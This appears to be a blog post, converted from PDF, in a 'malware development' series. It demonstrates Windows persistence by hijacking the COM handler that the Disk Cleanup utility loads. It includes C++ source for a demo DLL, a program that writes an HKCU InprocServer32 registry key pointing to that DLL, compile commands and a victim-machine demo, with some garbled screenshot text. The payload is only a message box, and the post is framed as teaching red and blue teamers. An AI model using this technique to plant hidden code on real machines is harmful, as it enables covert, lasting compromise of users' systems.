1/12 November 16, 2022 Malware development: persistence - part 19. Disk Cleanup Utility. Simple C++ example. cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html 2 minute read ﷽ Hello, cybersecurity enthusiasts and white hackers! This post is based on my own research into one of the more interesting malware persistence tricks: via Disk Cleanup Utility. disk cleanup If you have ever had an issue with limited hard disk space, you are certainly familiar with the Disk Cleanup utility: https://cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html 2/12 Good news for red teamers, the “Files to delete” list displayed in the user interface is not random. Just run command: reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches" /s 3/12 win 1O-x64 (peekaboo) [Running] ~ Oracle VM VirtualBox File Machine View Input Devices Help ition. All righ ycle Bin 64dbg & Disk Cleanup for Windows 10 (C:) ‘tup Temp oS Disk Cleanup. —_ y iginally created by pestudi - = ‘You can use Disk Cleanup to free up to 43.5 MB of disk space on Windows 10 (C:). Files to delete: Downloaded Program Files Obytes ES emporary Intemet Files 428 KB Oo LJ System created Windows Error Reporti... 12.5 MB . a 1 |) Direct Shader Cache Obytes ° . nchCache Oo LJ Delivery Optimization Files 156MB y Total amount of disk space you gain: 5.03 MB Description Downloaded Program Files are ActiveX controls and Java applets downloaded automatically from the Intemet when you view certain Pages. They are temporarily stored in the Downloaded Program Files folder on your hard disk lumeCach clean up system files View Files umeCach e ptimizat Cancel umeCache n.d11,-162 3/12 4/12 As you can see, there are even default values ​​of registry keys here. Also, if we have HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\default= , we can find another registry key value: HKCR\CLSID\\InProcServer32 = : 5/12 For demo purposes, here I show the example of the registry from HKEY_CLASSES_ROOT because HKEY_CURRENT_USER is empty This suggests, that we can use COM DLL hijacking for persistence. Let’s try. practical example First of all, as usually, create “evil” DLL ( hack.cpp ): https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html 6/12 /* hack.cpp simple DLL author: @cocomelonc https://cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html */ #include #pragma comment (lib, "user32.lib") BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { switch (nReason) { case DLL_PROCESS_ATTACH: MessageBox( NULL, "Meow-meow!", "=^..^=", MB_OK ); break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; } As usually, for simplicity, it’s just meow-meow messagbox. And then create persistence script ( pers.cpp ): 7/12 /* pers.cpp windows persistence via Disk Cleaner author: @cocomelonc https://cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html */ #include #include #include int main(int argc, char* argv[]) { HKEY hkey = NULL; // subkey const char* sk = "Software\\Classes\\CLSID\\{8369AB20-56C9-11D0-94E8- 00AA0059CE02}\\InprocServer32"; // malicious DLL const char* dll = "Z:\\2022-11-16-malware-pers-19\\hack.dll"; // startup LONG res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR)sk, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_QUERY_VALUE, NULL, &hkey, NULL); if (res == ERROR_SUCCESS) { // create new registry keys RegSetValueEx(hkey, NULL, 0, REG_SZ, (unsigned char*)dll, strlen(dll)); RegCloseKey(hkey); } else { printf("cannot create subkey value :(\n"); return -1; } return 0; } As CLSID I took 8369AB20-56C9-11D0-94E8-00AA0059CE02 . As you can see code is similar to COM hijacking post. The difference is only in the values of the variables. demo Let’s go to compile our evil DLL: x86_64-w64-mingw32-gcc -shared -o hack.dll hack.cpp https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html 8/12 And persistence script: x86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s - ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all- constants -static-libstdc++ -static-libgcc -fpermissive Copy to victim’s machine. In my case Windows 10 x64 . Run: reg query "HKCU\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s .\pers.exe 9/12 win10-x64 (peekaboo) [Running] - Oracle VM VirtualBox Machine View Input Devices Help . query find the HKEY_CURRENT_USE (Default) 11-16-malware-p Meow-meow! pe here to search 9/12 10/12 As you can see, everything is worked perfectly! =^..^= But for persistence. requires the user to run Disk Cleanup Utility. Here, I can use one of the classic trick for persistence. Adding Disk Cleanup to run during the start-up may not be the best idea, because it has a GUI. I tried using the command line arguments of this program: cleanmgr.exe cleanmgr.exe /cleanup cleanmgr.exe /autoclean cleanmgr.exe /setup But failed :(. It worked correctly: https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html 11/12 I think I will return to this issue in one of the future posts. Also, according to microsoft documentation, we can add new entries to: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches I don’t know if any APT in the wild used this tactic and trick, but, I hope this post spreads awareness to the blue teamers of this interesting technique especially when create software, and adds a weapon to the red teamers arsenal. This is a practical case for educational purposes only. MSDN Registering Disk Cleanup Handler DLL hijacking DLL hijacking with exported functions Malware persistence: part 1 Malware persistence: part 3 source code in github https://learn.microsoft.com/en-us/windows/win32/lwef/disk-cleanup?redirectedfrom=MSDN#registration https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html https://cocomelonc.github.io/pentest/2021/10/12/dll-hijacking-2.html https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html https://github.com/cocomelonc/2022-11-16-malware-pers-19 12/12 Thanks for your time happy hacking and good bye! PS. All drawings and screenshots are mine